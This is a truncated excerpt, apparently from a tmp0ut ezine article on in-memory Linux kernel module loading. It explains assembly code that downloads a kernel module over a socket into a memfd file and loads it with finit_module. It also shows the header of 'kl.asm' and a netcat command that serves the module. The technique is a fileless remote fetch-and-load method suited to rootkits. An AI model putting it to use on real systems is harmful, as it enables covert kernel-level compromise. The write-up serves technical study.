1.9 In-Memory LKM Loading
@eZine
Published in
tmp0ut
· 2 years ago
... le from /proc/self/fd/4 here: https://github.com/netspooky/golfclub/blob/master/linux/dl_memfd_219.asm#L100 Once we've got our memfd file set up, we read the socket buffer from the remote host, and write it to our file descriptor. After the file has been downloaded to our memfd file, we use the finit_module syscall to load a kernel module via a file descriptor. kl.asm ;-- Download a kernel module from 127.0.0.1:42000 to memory and load -------//-- ; __ __ . __ __ __ __ . . . setup: ; | ||__||_ |__ |__|| || ||_/| | $ cat somekernelmodule.ko | nc -lvp 42000 ; | || | || |o ||o ||\ |__| b ...